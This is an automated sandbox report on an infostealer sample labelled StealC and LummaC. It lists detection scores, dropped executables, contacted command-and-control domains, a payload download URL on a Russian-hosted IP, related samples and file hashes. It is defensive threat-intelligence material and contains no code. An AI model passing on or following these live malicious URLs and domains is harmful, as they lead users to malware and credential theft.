Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
TUp6f2knn2.exe	74%	ReversingLabs	Win32.Trojan.StealC
TUp6f2knn2.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	100%	Avira	HEUR/AGEN.1312567
C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	100%	Avira	HEUR/AGEN.1312567
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	68%	ReversingLabs	Win32.Trojan.StealC
C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	68%	ReversingLabs	Win32.Trojan.StealC

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://rapeflowwj.lat/L	100%	Avira URL Cloud	malware
https://rapeflowwj.lat/IN	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exe.	100%	Avira URL Cloud	malware
http://176.113.115.19/ScreenUpdateSync.exen	0%	Avira URL Cloud	safe
http://176.113.115.19/ScreenUpdateSync.exe(	0%	Avira URL Cloud	safe
https://rapeflowwj.lat/	100%	Avira URL Cloud	malware
https://rapeflowwj.lat/i	100%	Avira URL Cloud	malware
https://post-to-me.com/track_prt.php?sub=0&cc=DEQb	100%	Avira URL Cloud	malware
https://rapeflowwj.lat/apikXuSc	100%	Avira URL Cloud	malware
https://rapeflowwj.lat/api	100%	Avira URL Cloud	malware
https://rapeflowwj.lat/mN	100%	Avira URL Cloud	malware
https://rapeflowwj.lat/apireW08D	100%	Avira URL Cloud	malware
https://rapeflowwj.lat/(	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
post-to-me.com	172.67.179.207	true	false		high
rapeflowwj.lat	104.21.24.223	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
necklacebudi.lat	false		high
aspecteirs.lat	false		high
https://post-to-me.com/track_prt.php?sub=0&cc=DE	false		high
sustainskelet.lat	false		high
crosshuaht.lat	false		high
rapeflowwj.lat	false		high
https://rapeflowwj.lat/api	true	Avira URL Cloud: malware	unknown
energyaffai.lat	false		high
grannyejh.lat	false		high
discokeyus.lat	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	B4A1.tmp.exe, 00000001.00000003.1816759943.0000000003240000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816602266.0000000003243000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816836901.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	B4A1.tmp.exe, 00000001.00000003.1816759943.0000000003240000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816602266.0000000003243000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816836901.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exen	TUp6f2knn2.exe, 00000000.00000003.4001062036.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, TUp6f2knn2.exe, 00000000.00000002.4130607671.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DEQb	TUp6f2knn2.exe, 00000000.00000003.4001062036.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, TUp6f2knn2.exe, 00000000.00000002.4130607671.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://rapeflowwj.lat/	B4A1.tmp.exe, 00000001.00000003.1866981043.0000000003205000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://rapeflowwj.lat/IN	B4A1.tmp.exe, 00000001.00000003.1815897318.00000000009A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	B4A1.tmp.exe, 00000001.00000003.1816759943.0000000003240000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816602266.0000000003243000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816836901.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	B4A1.tmp.exe, 00000001.00000003.1817285513.000000000324F000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1817192653.0000000003256000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1841093343.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exe	TUp6f2knn2.exe, 00000000.00000003.1751814866.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://rapeflowwj.lat/L	B4A1.tmp.exe, 00000001.00000002.2190349192.00000000031F0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	B4A1.tmp.exe, 00000001.00000003.1868602057.000000000324E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	B4A1.tmp.exe, 00000001.00000003.1868602057.000000000324E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	B4A1.tmp.exe, 00000001.00000003.1817285513.000000000322A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	B4A1.tmp.exe, 00000001.00000003.1816759943.0000000003240000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816602266.0000000003243000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816836901.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	B4A1.tmp.exe, 00000001.00000003.1870293366.000000000331C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://rapeflowwj.lat/i	B4A1.tmp.exe, 00000001.00000002.2190349192.00000000031F0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://176.113.115.19/ScreenUpdateSync.exe(	TUp6f2knn2.exe, 00000000.00000003.1751814866.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://post-to-me.com/track_prt.php?sub=&cc=DE	TUp6f2knn2.exe, 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exe.	TUp6f2knn2.exe, 00000000.00000003.4001062036.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, TUp6f2knn2.exe, 00000000.00000002.4130607671.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	B4A1.tmp.exe, 00000001.00000003.1816759943.0000000003240000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816602266.0000000003243000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816836901.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false		high
https://rapeflowwj.lat/apikXuSc	B4A1.tmp.exe, 00000001.00000003.1841226033.0000000003207000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	B4A1.tmp.exe, 00000001.00000003.1816759943.0000000003240000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816602266.0000000003243000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816836901.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	B4A1.tmp.exe, 00000001.00000003.1868602057.000000000324E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.7.dr	false		high
http://ocsp.rootca1.amazontrust.com0:	B4A1.tmp.exe, 00000001.00000003.1868602057.000000000324E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	B4A1.tmp.exe, 00000001.00000003.1817285513.000000000324F000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1817192653.0000000003256000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1841093343.000000000324F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	B4A1.tmp.exe, 00000001.00000003.1816759943.0000000003240000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816602266.0000000003243000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816836901.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	B4A1.tmp.exe, 00000001.00000003.1870293366.000000000331C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	B4A1.tmp.exe, 00000001.00000003.1816759943.0000000003240000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816602266.0000000003243000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816836901.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false		high
http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE	TUp6f2knn2.exe, 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp	false		high
https://post-to-me.com/track_prt.php?sub=	TUp6f2knn2.exe	false		high
https://rapeflowwj.lat/apireW08D	B4A1.tmp.exe, 00000001.00000003.1842793116.0000000003208000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1841493155.0000000003208000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1841226033.0000000003207000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1843781600.0000000003204000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.microsof	B4A1.tmp.exe, 00000001.00000003.1817192653.0000000003256000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	B4A1.tmp.exe, 00000001.00000003.1868602057.000000000324E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://post-to-me.com/	TUp6f2knn2.exe, 00000000.00000003.4001062036.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, TUp6f2knn2.exe, 00000000.00000002.4130607671.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://rapeflowwj.lat/mN	B4A1.tmp.exe, 00000001.00000003.1815897318.00000000009A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	B4A1.tmp.exe, 00000001.00000003.1817285513.000000000322A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	B4A1.tmp.exe, 00000001.00000003.1816759943.0000000003240000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816602266.0000000003243000.00000004.00000800.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1816836901.0000000003240000.00000004.00000800.00020000.00000000.sdmp	false		high
https://rapeflowwj.lat/(	B4A1.tmp.exe, 00000001.00000002.2190349192.00000000031F0000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.179.207	post-to-me.com	United States	13335	CLOUDFLARENETUS	false
104.21.24.223	rapeflowwj.lat	United States	13335	CLOUDFLARENETUS	true
176.113.115.19	unknown	Russian Federation	49505	SELECTELRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1577889
Start date and time:	2024-12-18 21:08:53 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TUp6f2knn2.exe renamed because original name is a hash value
Original Sample Name:	a4f21b597fb56b09132987c396b7acc2.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/7@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 92% Number of executed functions: 46 Number of non-executed functions: 324
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.12.23.50, 20.190.181.5, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: TUp6f2knn2.exe

Simulations

Behavior and APIs

Time	Type	Description
15:09:49	API Interceptor	8704571x Sleep call for process: TUp6f2knn2.exe modified
15:09:56	API Interceptor	5x Sleep call for process: B4A1.tmp.exe modified
15:10:35	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.179.207	sqJIHyPqhr.exe	Get hash	malicious	LummaC	Browse
	InstallSetup.exe	Get hash	malicious	LummaC	Browse
	wN8pQhRNnu.exe	Get hash	malicious	LummaC	Browse
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse
	SEejSLAS9f.exe	Get hash	malicious	Stealc	Browse
	EbXj93v3bO.exe	Get hash	malicious	Stealc	Browse
	ssB9bjDQPf.exe	Get hash	malicious	Stealc	Browse
	6X4BIzTTBR.exe	Get hash	malicious	Stealc	Browse
	IeccNv7PP6.exe	Get hash	malicious	Stealc, Vidar	Browse
	XOr3Kqyo9n.exe	Get hash	malicious	Stealc	Browse
104.21.24.223	ScreenUpdateSync.exe	Get hash	malicious	LummaC	Browse
176.113.115.19	sqJIHyPqhr.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	InstallSetup.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	hpEAJnNwCB.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	DG55Gu1yGM.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	wN8pQhRNnu.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe
	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	176.113.115.19/ScreenUpdateSync.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
post-to-me.com	sqJIHyPqhr.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	InstallSetup.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	hpEAJnNwCB.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	DG55Gu1yGM.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	wN8pQhRNnu.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	AZCFTWko2q.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	rHrG691f7q.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
	TN78WX7nJU.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	XIaCqh1vRm.exe	Get hash	malicious	LummaC	Browse	104.21.56.70
rapeflowwj.lat	sqJIHyPqhr.exe	Get hash	malicious	LummaC	Browse	172.67.220.223
	InstallSetup.exe	Get hash	malicious	LummaC	Browse	172.67.220.223
	ScreenUpdateSync.exe	Get hash	malicious	LummaC	Browse	104.21.24.223

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	QIo3SytSZA.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	Payment_Failure_Notice_Office365_sdf_[13019].html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	R4qP4YM0QX.lnk	Get hash	malicious	Unknown	Browse	172.64.41.3
	D2Cw8gWOXj.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.179.109
	https://vCyA.warmickmak.ru/PrEvJj/	Get hash	malicious	Unknown	Browse	104.17.25.14
	sqJIHyPqhr.exe	Get hash	malicious	LummaC	Browse	172.67.220.223
	k6A01XaeEn.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	https://52kz793.afratradingagency.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpeg	Get hash	malicious	HTMLPhisher	Browse	104.26.6.189
	solara-executor.exe	Get hash	malicious	Unknown	Browse	172.67.75.163
SELECTELRU	sqJIHyPqhr.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpeg	Get hash	malicious	HTMLPhisher	Browse	82.202.242.100
	2.png.ps1	Get hash	malicious	Unknown	Browse	176.113.115.178
	1.png.ps1	Get hash	malicious	Unknown	Browse	176.113.115.178
	GO.png.ps1	Get hash	malicious	Unknown	Browse	176.113.115.178
	file.exe	Get hash	malicious	Unknown	Browse	176.113.115.178
	InstallSetup.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	hpEAJnNwCB.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	DG55Gu1yGM.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	176.113.115.19
CLOUDFLARENETUS	QIo3SytSZA.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	Payment_Failure_Notice_Office365_sdf_[13019].html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	R4qP4YM0QX.lnk	Get hash	malicious	Unknown	Browse	172.64.41.3
	D2Cw8gWOXj.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.67.179.109
	https://vCyA.warmickmak.ru/PrEvJj/	Get hash	malicious	Unknown	Browse	104.17.25.14
	sqJIHyPqhr.exe	Get hash	malicious	LummaC	Browse	172.67.220.223
	k6A01XaeEn.exe	Get hash	malicious	LummaC	Browse	104.21.21.99
	https://52kz793.afratradingagency.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpeg	Get hash	malicious	HTMLPhisher	Browse	104.26.6.189
	solara-executor.exe	Get hash	malicious	Unknown	Browse	172.67.75.163

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	D2Cw8gWOXj.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.24.223
	sqJIHyPqhr.exe	Get hash	malicious	LummaC	Browse	104.21.24.223
	k6A01XaeEn.exe	Get hash	malicious	LummaC	Browse	104.21.24.223
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	104.21.24.223
	'Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.24.223
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.24.223
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, Stealc	Browse	104.21.24.223
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	104.21.24.223
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	104.21.24.223
37f463bf4616ecd445d4a1937da06e19	QIo3SytSZA.exe	Get hash	malicious	Vidar	Browse	172.67.179.207
	R4qP4YM0QX.lnk	Get hash	malicious	Unknown	Browse	172.67.179.207
	R8CAg00Db8.lnk	Get hash	malicious	Unknown	Browse	172.67.179.207
	s4PymYGgSh.lnk	Get hash	malicious	Unknown	Browse	172.67.179.207
	sqJIHyPqhr.exe	Get hash	malicious	LummaC	Browse	172.67.179.207
	solara-executor.exe	Get hash	malicious	Unknown	Browse	172.67.179.207
	List of required items and services.pdf.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	172.67.179.207
	g8ix97hz.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	172.67.179.207
	solara-executor.exe	Get hash	malicious	Unknown	Browse	172.67.179.207

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	sqJIHyPqhr.exe	Get hash	malicious	LummaC	Browse
C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	InstallSetup.exe	Get hash	malicious	LummaC	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	sqJIHyPqhr.exe	Get hash	malicious	LummaC	Browse
	InstallSetup.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_B4A1.tmp.exe_ac695b942acde452d0e9c26289fa41d5e7476a_e5a20fe4_29f0898a-8b36-49f1-97a6-c003c8cfc686\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0654216678174528
Encrypted:	false
SSDEEP:	96:hxFX3vQ7sEhro77Rr6tQXIDcQsc67/cELcw3T+HbHg/8BRTf3Oy1E45WAU6NCUtz:nFQ7i0Cf/Rsju3mF5zuiFLZ24IO8I
MD5:	0607C0A5256E005B5E24F0679BAE392C
SHA1:	84455BA49ABD508886762BBFFBD6415E11E72DC2
SHA-256:	93DCB5951568E180458BF37649A9D496813E73935F18F5B14BE97BF5B429E7A3
SHA-512:	D2A362C0E65B0AE73722DB72DE02EB59F9ABB78DC973E116C8C04033EDDEF9B81205BF0A504304178ECFC89CAC29DAB7A5E7749F7A6C70CBA065A4C946EBA31A
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.2.6.2.0.8.0.8.9.7.2.1.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.2.6.2.0.9.1.0.5.3.4.7.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.9.f.0.8.9.8.a.-.8.b.3.6.-.4.9.f.1.-.9.7.a.6.-.c.0.0.3.c.8.c.f.c.6.8.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.2.c.7.7.b.e.4.-.6.1.e.9.-.4.9.8.9.-.9.5.f.a.-.7.6.f.a.f.5.d.5.5.f.e.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.4.A.1...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.2.4.-.0.0.0.1.-.0.0.1.4.-.0.7.4.5.-.4.b.c.c.8.8.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.4.2.0.5.8.7.c.9.6.3.1.9.3.e.8.c.a.9.0.4.1.a.6.f.b.2.9.8.8.f.e.0.0.0.0.f.f.f.f.!.0.0.0.0.9.1.7.d.a.5.4.9.8.5.6.f.d.1.c.b.8.8.7.6.d.6.a.a.9.7.f.2.0.4.f.4.6.e.4.2.a.2.f.e.!.B.4.A.1...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4./.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC693.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Dec 18 20:10:08 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	106654
Entropy (8bit):	2.1573015127215234
Encrypted:	false
SSDEEP:	384:qFnT52NTBtZN3svuziAd9A+V0gXRnWY8LOyDZAEB/JzBXOCTNsYFwoz24h8tnI:qXuTBKGW/+V0gYL6wwcBhgnI
MD5:	DDD9D21FCA21447C3B33694C66C59E7A
SHA1:	659F46FB0CA18A29742176691DFAD942AF986297
SHA-256:	5FD344F958E0B37A1AFE405F537438B99AF1728589EA19EBB2ECC46BDF3D578C
SHA-512:	5F7613C443BCE98C29CB856CEE953ECC2A414556AFA3021B65D2329EB8502E0A474C35F03F46828083388923C0FD8C63459789B91209BD822CEC6D954C616139
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ....... ,cg........................p...............h$...........N..........`.......8...........T...........pE...[...........$...........&..............................................................................eJ......p'......GenuineIntel............T.......$....,cg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC943.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8402
Entropy (8bit):	3.701887977183559
Encrypted:	false
SSDEEP:	192:R6l7wVeJtN6Rk6YHY6lgmfM+HpDM89bXhsfP9m:R6lXJn6Rk6Y46lgmfM+7XafY
MD5:	1091BBD34489606F8756636B7E64FA0D
SHA1:	D50970E3049BF0ED1881CFD8F0B4BA7FEB970584
SHA-256:	3DD2D1B5D3623D50901C8BC3B4DC9E7F28121D38A8C4F4F4C9BC099A600A3875
SHA-512:	0E5C102989DB885D020A61CFA81D02F247290EEA3D97573662387A661F1F97F235EBDB385F59C4C1B4D62EAF8C7E0746E5243FED0B324B9263ED2B4F7CE9CD76
Malicious:	false
Reputation:	low
